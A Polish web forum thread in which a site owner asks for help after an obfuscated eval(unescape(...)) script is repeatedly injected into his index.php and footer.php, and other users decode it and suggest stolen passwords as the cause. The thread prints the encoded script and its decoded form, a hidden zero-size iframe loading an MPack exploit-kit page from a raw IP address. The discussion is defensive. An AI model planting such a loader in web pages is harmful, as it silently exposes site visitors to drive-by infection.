JavaScript

[adik1989]

Witam!

Ostatnimi czasy kilka razy dziennie zostaje mi wklejany następujący kod java script:

<script type="text/javascript" language="JavaScript"> eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%5C%22%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%35%30%2E%38%32%2F%6D%70%61%63%6B%2F%69%6E%64%65%78%2E%70%68%70%5C%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%5C%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%5C%22%3E%3C%2F%69%66%72%61%6D%65%3E%22%29%3B%0D%0A%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%22%20%22%3B"));</script>

Czy mieliście podobne przypadki ?

Jak się przed tym zabezpieczyć ?

Czynności jakie poczyniłem to :

- zamiana hasła do serwera

- pełny skan antywirusem PC'ta przed trojanami i podobnymi robakami.

Co dalej ?

Kod JavaScript zostaje mi wklejany w plikach:

- index.php

- footer.php

[tkosau]

Zakodowany kod to:

document.write("<iframe src="https://81.95.150.82/mpack/index.php" width=0 height=0 style="display:none"></iframe>");

window.status=" ";

Mpack to jakiś ruski pakiet wiecej...

Podatny na atak jest min. cPanel wiecej...

[-macgyver-]

Miałem już styczność kilkanaście razy z podobnym wsadem na różne strony, całość zeszła do tego że hasła musiały byc przechwytywane z komputera ofiary, nie było innej możliwości.

Bot włamujący się znał hasło nie kombinował aby wejść na atakowaną stronę.

Był wcześniej podobny wątek Kyo, i myślę że u niego pełne skanowanie komputera i zmiana haseł wystarczyła.